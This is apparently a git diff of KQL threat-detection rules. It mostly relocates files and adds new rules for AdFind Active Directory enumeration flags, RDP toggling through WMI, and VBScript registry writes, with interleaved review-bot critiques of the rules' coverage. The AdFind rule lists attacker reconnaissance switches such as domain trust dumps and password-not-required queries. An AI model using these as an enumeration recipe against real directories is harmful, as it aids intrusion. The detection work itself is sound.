diff --git a/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
new file mode 100644
index 00000000..221c1c19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - AdFind Suspicious Execution
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
+// Date: 2021-02-02
+// Level: high
+// Description: Detects AdFind execution with common flags seen used during attacks
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
+// False Positives:
+// - Legitimate admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains "-sc dclist" or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_adidnsdump_execution.kql
rename to KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
diff --git a/KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql
rename to KQL/rules/windows/process_creation/pua_advanced_ip_scanner_execution.kql
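Review bot: The filter on the last line is a 19-way substring OR with no constraint on the image, so short tokens such as `adinfo`, `dompol` and `objectcategory=` will also fire on any process whose command line happens to carry them (LDAP filters handed to other directory tooling, for instance), which the single "Legitimate admin activity" bullet under-describes. If the unanchored match is deliberate so that renamed copies are still caught, say so in the header, e.g. `// Note: intentionally not restricted to adfind.exe so renamed copies are caught; expect substring hits from other LDAP tooling`; otherwise anchor it the way the WerFaultSecure and RDP rules in this commit do, with a `FolderPath endswith "\\adfind.exe" or ProcessVersionInfoOriginalFileName =~ "AdFind.exe"` clause. The same unanchored-substring pattern recurs in the VBScript registry rule hunk further down.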
diff --git a/KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql b/KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql
rename to KQL/rules/windows/process_creation/pua_advanced_port_scanner_execution.kql
diff --git a/KQL/rules/Execution/pua_advancedrun_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_advancedrun_execution.kql
rename to KQL/rules/windows/process_creation/pua_advancedrun_execution.kql
diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
rename to KQL/rules/windows/process_creation/pua_advancedrun_suspicious_execution.kql
diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
rename to KQL/rules/windows/process_creation/pua_chisel_tunneling_tool_execution.kql
diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
rename to KQL/rules/windows/process_creation/pua_cleanwipe_execution.kql
diff --git a/KQL/rules/Discovery/pua_crassus_execution.kql b/KQL/rules/windows/process_creation/pua_crassus_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_crassus_execution.kql
rename to KQL/rules/windows/process_creation/pua_crassus_execution.kql
diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/windows/process_creation/pua_csexec_execution.kql
similarity index 100%
rename from KQL/rules/Resource Development/pua_csexec_execution.kql
rename to KQL/rules/windows/process_creation/pua_csexec_execution.kql
diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
rename to KQL/rules/windows/process_creation/pua_defendercheck_execution.kql
diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
similarity index 100%
rename from KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
rename to KQL/rules/windows/process_creation/pua_dit_snapshot_viewer.kql
diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
rename to KQL/rules/windows/process_creation/pua_fast_reverse_proxy_frp_execution.kql
diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
rename to KQL/rules/windows/process_creation/pua_iox_tunneling_tool_execution.kql
diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/pua_mouse_lock_execution.kql
rename to KQL/rules/windows/process_creation/pua_mouse_lock_execution.kql
diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
rename to KQL/rules/windows/process_creation/pua_netcat_suspicious_execution.kql
diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/windows/process_creation/pua_ngrok_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_ngrok_execution.kql
rename to KQL/rules/windows/process_creation/pua_ngrok_execution.kql
diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_nimgrab_execution.kql
rename to KQL/rules/windows/process_creation/pua_nimgrab_execution.kql
diff --git a/KQL/rules/Execution/pua_nircmd_execution.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_nircmd_execution.kql
rename to KQL/rules/windows/process_creation/pua_nircmd_execution.kql
diff --git a/KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql b/KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
similarity index 100%
rename from KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql
rename to KQL/rules/windows/process_creation/pua_nircmd_execution_as_local_system.kql
diff --git a/KQL/rules/Discovery/pua_nmap_zenmap_execution.kql b/KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_nmap_zenmap_execution.kql
rename to KQL/rules/windows/process_creation/pua_nmap_zenmap_execution.kql
diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
rename to KQL/rules/windows/process_creation/pua_nps_tunneling_tool_execution.kql
diff --git a/KQL/rules/Execution/pua_nsudo_execution.kql b/KQL/rules/windows/process_creation/pua_nsudo_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_nsudo_execution.kql
rename to KQL/rules/windows/process_creation/pua_nsudo_execution.kql
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/pua_pingcastle_execution.kql
rename to KQL/rules/windows/process_creation/pua_pingcastle_execution.kql
diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
rename to KQL/rules/windows/process_creation/pua_pingcastle_execution_from_potentially_suspicious_parent.kql
diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
rename to KQL/rules/windows/process_creation/pua_potential_pe_metadata_tamper_using_rcedit.kql
diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
rename to KQL/rules/windows/process_creation/pua_process_hacker_execution.kql
diff --git a/KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql b/KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql
rename to KQL/rules/windows/process_creation/pua_radmin_viewer_utility_execution.kql
diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/windows/process_creation/pua_rclone_execution.kql
similarity index 100%
rename from KQL/rules/Exfiltration/pua_rclone_execution.kql
rename to KQL/rules/windows/process_creation/pua_rclone_execution.kql
diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
similarity index 100%
rename from KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
rename to KQL/rules/windows/process_creation/pua_restic_backup_tool_execution.kql
diff --git a/KQL/rules/Execution/pua_runxcmd_execution.kql b/KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_runxcmd_execution.kql
rename to KQL/rules/windows/process_creation/pua_runxcmd_execution.kql
diff --git a/KQL/rules/Discovery/pua_seatbelt_execution.kql b/KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_seatbelt_execution.kql
rename to KQL/rules/windows/process_creation/pua_seatbelt_execution.kql
diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_softperfect_netscan_execution.kql
rename to KQL/rules/windows/process_creation/pua_softperfect_netscan_execution.kql
diff --git a/KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql b/KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
rename to KQL/rules/windows/process_creation/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql
diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/windows/process_creation/pua_system_informer_execution.kql
similarity index 100%
rename from KQL/rules/Persistence/pua_system_informer_execution.kql
rename to KQL/rules/windows/process_creation/pua_system_informer_execution.kql
diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/windows/process_creation/pua_trufflehog_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pua_trufflehog_execution.kql
rename to KQL/rules/windows/process_creation/pua_trufflehog_execution.kql
diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
rename to KQL/rules/windows/process_creation/pua_webbrowserpassview_execution.kql
diff --git a/KQL/rules/Execution/pua_wsudo_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pua_wsudo_suspicious_execution.kql
rename to KQL/rules/windows/process_creation/pua_wsudo_suspicious_execution.kql
diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
rename to KQL/rules/windows/process_creation/pubprn_vbs_proxy_execution.kql
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
rename to KQL/rules/windows/process_creation/python_function_execution_security_warning_disabled_in_excel.kql
diff --git a/KQL/rules/Execution/python_inline_command_execution.kql b/KQL/rules/windows/process_creation/python_inline_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/python_inline_command_execution.kql
rename to KQL/rules/windows/process_creation/python_inline_command_execution.kql
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql b/KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql
similarity index 100%
rename from KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql
rename to KQL/rules/windows/process_creation/python_spawning_pretty_tty_on_windows.kql
diff --git a/KQL/rules/Execution/query_usage_to_exfil_data.kql b/KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
similarity index 100%
rename from KQL/rules/Execution/query_usage_to_exfil_data.kql
rename to KQL/rules/windows/process_creation/query_usage_to_exfil_data.kql
diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/windows/process_creation/quickassist_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/quickassist_execution.kql
rename to KQL/rules/windows/process_creation/quickassist_execution.kql
diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/windows/process_creation/raccine_uninstall.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/raccine_uninstall.kql
rename to KQL/rules/windows/process_creation/raccine_uninstall.kql
diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
similarity index 100%
rename from KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql
rename to KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql
diff --git a/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql
new file mode 100644
index 00000000..52185e31
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql
@@ -0,0 +1,15 @@
+// Title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class
+// Author: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-15
+// Level: medium
+// Description: Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.
+// In PowerShell one-liner commands, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP.
+// In WMIC, the "rdtoggle" alias or "Win32_TerminalServiceSetting" class may be used for the same purpose.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001, attack.execution, attack.t1047
+// False Positives:
+// - Legitimate system administrators enabling RDP for remote support
+// - System configuration scripts during deployment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "rdtoggle" or ProcessCommandLine contains "Win32_TerminalServiceSetting") and ProcessCommandLine contains "SetAllowTSConnections" and ((FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql
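Review bot: The rule only matches when the class and method names are typed on the command line, so a PowerShell script run from a file that calls `SetAllowTSConnections` inside its body produces no DeviceProcessEvents hit, and the header does not mention this coverage boundary. A line under Description would set expectations for the analyst, e.g. `// Limitation: process-creation telemetry only; fires when the WMI class/method names appear in the command line, not when they live inside a script file`. The description also promises to detect "enabling or disabling" but nothing in the query distinguishes the two; appending `| project-reorder Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine` would let the triager read the boolean argument and the parent without re-querying, while leaving the filter untouched.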
diff --git a/KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql
similarity index 100%
rename from KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql
rename to KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql
diff --git a/KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql
similarity index 100%
rename from KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql
rename to KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql
diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
rename to KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql
diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql
similarity index 100%
rename from KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql
rename to KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql
diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql
similarity index 100%
rename from KQL/rules/Persistence/reg_add_suspicious_paths.kql
rename to KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql
diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
rename to KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql
diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
rename to KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql
diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
rename to KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql
diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql
similarity index 100%
rename from KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
rename to KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql
diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql
similarity index 100%
rename from KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql
rename to KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql
diff --git a/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql
new file mode 100644
index 00000000..8e185f1f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql
@@ -0,0 +1,12 @@
+// Title: Registry Modification Attempt Via VBScript
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-13
+// Level: medium
+// Description: Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs.
+// It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.
+// Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "Wscript.shell" and ProcessCommandLine contains ".RegWrite"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/registry_modification_via_regini_exe.kql
rename to KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql
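Review bot: The header omits the `// False Positives:` section that the other new rules in this commit carry (the WerFaultSecure, AdFind and RDP rules above all have one), so the rule is inconsistent with its siblings and gives the triager no starting point; adding `// False Positives:` followed by `// - Administrative VBScript that writes registry values inline on the command line` would bring it in line. The description promises detection "via common LOLBINs", yet the filter on the last line is a pure substring match on `ProcessCommandLine` with no image constraint, as in the AdFind rule; either name the expected host binaries in the header or add a `FolderPath` / `ProcessVersionInfoOriginalFileName` clause the way the RDP rule does. The three substrings are also only present when the script text is inline on the command line, so a `.vbs` run from disk produces no hit, which is worth stating under Description.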
diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
rename to KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql
diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
rename to KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql
rename to KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql
diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql
rename to KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
similarity index 100%
rename from KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_piped_password_via_cli.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_anydesk_silent_installation.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_gotoassist_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_logmein_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_netsupport_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_potential_meshagent_execution_windows.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_renamed_meshagent_execution_windows.kql
diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_rurat_execution_from_unusual_location.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_execution.kql
diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
similarity index 100%
rename from KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql
rename to KQL/rules/windows/process_creation/remote_access_tool_screenconnect_installation_execution.kql
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
